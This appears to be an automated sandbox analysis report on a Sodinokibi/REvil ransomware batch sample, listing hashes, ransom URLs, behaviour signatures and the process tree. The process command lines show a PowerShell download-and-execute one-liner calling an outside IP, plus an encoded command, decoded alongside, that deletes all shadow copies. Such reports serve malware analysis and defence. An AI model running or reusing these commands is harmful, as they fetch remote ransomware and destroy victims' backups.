Analysis
- Max time kernel: 51s
- Max time network: 55s
- Platform: windows7_x64
- Resource: win7v200722
- Submitted: 10-08-2020 10:10

Static task: static1

Behavioral task: behavioral1
- Sample: 3defad0fc0a8b4e37a73ffc6d2ea8f2c.bat
- Resource: win7v200722

Behavioral task: behavioral2
- Sample: 3defad0fc0a8b4e37a73ffc6d2ea8f2c.bat
- Resource: win10v200722
General
- Target: 3defad0fc0a8b4e37a73ffc6d2ea8f2c.bat
- Size: 217B
- MD5: 2ab61d56f01d736001ccaac50b4175b3
- SHA1: eb1e9c14e901a1dc760cf78c692a5ebc095b6bda
- SHA256: db2c20d79fbbbaf8f83bee3506d0a2dfa7bcb5fd1e69be9abcf7c0016f0679ed
- SHA512: 81c624f718127b9f15c9f5fcc73b8e141263291061054393063974ba20c531574d9bbba856c2b63e0ac40a87067984b82dcd641eadffba3e6b804811bb9316cc
Malware Config
- Extracted from: http://185.103.242.78/pastes/3defad0fc0a8b4e37a73ffc6d2ea8f2c
- Extracted from: C:\9tn257c-readme.txt
  - Family: sodinokibi
  - URL: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/861ABC9D5555F057
  - URL: http://decryptor.cc/861ABC9D5555F057
Signatures
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes: cmd.exe, powershell.exe
  - PID 280 (cmd.exe) wrote to memory of PID 868 (powershell.exe), 4 events
  - PID 868 (powershell.exe) wrote to memory of PID 1848 (powershell.exe), 4 events
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes: powershell.exe
  - PID 868 powershell.exe
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  - Token: SeDebugPrivilege, PID 868 powershell.exe
  - Token: SeDebugPrivilege, PID 868 powershell.exe
  - Token: SeDebugPrivilege, PID 1848 powershell.exe
  - Token: SeBackupPrivilege, PID 1604 vssvc.exe
  - Token: SeRestorePrivilege, PID 1604 vssvc.exe
  - Token: SeAuditPrivilege, PID 1604 vssvc.exe
  - Token: SeTakeOwnershipPrivilege, PID 868 powershell.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8144168.bmp" (powershell.exe)
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: powershell.exe, powershell.exe
  - PID 868 powershell.exe (3 events)
  - PID 1848 powershell.exe (2 events)
- Blacklisted process makes network request (1 IoC)
  Processes: powershell.exe
  - Flow 3, PID 868 powershell.exe
- Modifies extensions of user files (12 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: powershell.exe
  - File renamed: C:\Users\Admin\Pictures\FindRead.crw => \??\c:\users\admin\pictures\FindRead.crw.9tn257c (powershell.exe)
  - File renamed: C:\Users\Admin\Pictures\MoveUnprotect.png => \??\c:\users\admin\pictures\MoveUnprotect.png.9tn257c (powershell.exe)
  - File renamed: C:\Users\Admin\Pictures\RemoveComplete.raw => \??\c:\users\admin\pictures\RemoveComplete.raw.9tn257c (powershell.exe)
  - File renamed: C:\Users\Admin\Pictures\RequestUnprotect.tif => \??\c:\users\admin\pictures\RequestUnprotect.tif.9tn257c (powershell.exe)
  - File renamed: C:\Users\Admin\Pictures\RevokeFormat.tif => \??\c:\users\admin\pictures\RevokeFormat.tif.9tn257c (powershell.exe)
  - File renamed: C:\Users\Admin\Pictures\DenyEnable.png => \??\c:\users\admin\pictures\DenyEnable.png.9tn257c (powershell.exe)
  - File renamed: C:\Users\Admin\Pictures\EnterAdd.tif => \??\c:\users\admin\pictures\EnterAdd.tif.9tn257c (powershell.exe)
  - File renamed: C:\Users\Admin\Pictures\NewSkip.png => \??\c:\users\admin\pictures\NewSkip.png.9tn257c (powershell.exe)
  - File renamed: C:\Users\Admin\Pictures\RemoveUnregister.tiff => \??\c:\users\admin\pictures\RemoveUnregister.tiff.9tn257c (powershell.exe)
  - File renamed: C:\Users\Admin\Pictures\SyncSwitch.raw => \??\c:\users\admin\pictures\SyncSwitch.raw.9tn257c (powershell.exe)
  - File opened for modification: \??\c:\users\admin\pictures\RemoveUnregister.tiff (powershell.exe)
  - File renamed: C:\Users\Admin\Pictures\ExitUnlock.png => \??\c:\users\admin\pictures\ExitUnlock.png.9tn257c (powershell.exe)
- Drops file in Program Files directory (22 IoCs)
  Processes: powershell.exe
  - File opened for modification: \??\c:\program files\PingOpen.DVR (powershell.exe)
  - File opened for modification: \??\c:\program files\RenameMount.ini (powershell.exe)
  - File opened for modification: \??\c:\program files\SwitchSkip.wm (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\9tn257c-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\UndoGroup.xlsb (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\9tn257c-readme.txt (powershell.exe)
  - File created: \??\c:\program files (x86)\9tn257c-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\ConnectRead.svg (powershell.exe)
  - File opened for modification: \??\c:\program files\DenyUnprotect.jpeg (powershell.exe)
  - File opened for modification: \??\c:\program files\LimitUnlock.wma (powershell.exe)
  - File opened for modification: \??\c:\program files\RestartLimit.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\TestResolve.3gp2 (powershell.exe)
  - File opened for modification: \??\c:\program files\BlockHide.rle (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\9tn257c-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\UnblockStep.wma (powershell.exe)
  - File opened for modification: \??\c:\program files\UnlockApprove.rar (powershell.exe)
  - File created: \??\c:\program files\9tn257c-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\AddMeasure.potx (powershell.exe)
  - File opened for modification: \??\c:\program files\CloseImport.htm (powershell.exe)
  - File opened for modification: \??\c:\program files\RenameClose.tiff (powershell.exe)
  - File opened for modification: \??\c:\program files\SendRepair.xml (powershell.exe)
  - File opened for modification: \??\c:\program files\UndoConvertTo.xltx (powershell.exe)
Processes
- C:\Windows\system32\cmd.exe (PID 280)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\3defad0fc0a8b4e37a73ffc6d2ea8f2c.bat"
  Signatures:
  - Suspicious use of WriteProcessMemory
  Child process:
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 868)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/3defad0fc0a8b4e37a73ffc6d2ea8f2c');Invoke-PJWVUIZXTL;Start-Sleep -s 10000"
    Signatures:
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    - Sets desktop wallpaper using registry
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Drops file in Program Files directory
    Child process:
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1848)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is UTF-16LE base64 and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} )
      Signatures:
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\vssvc.exe (PID 1604)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken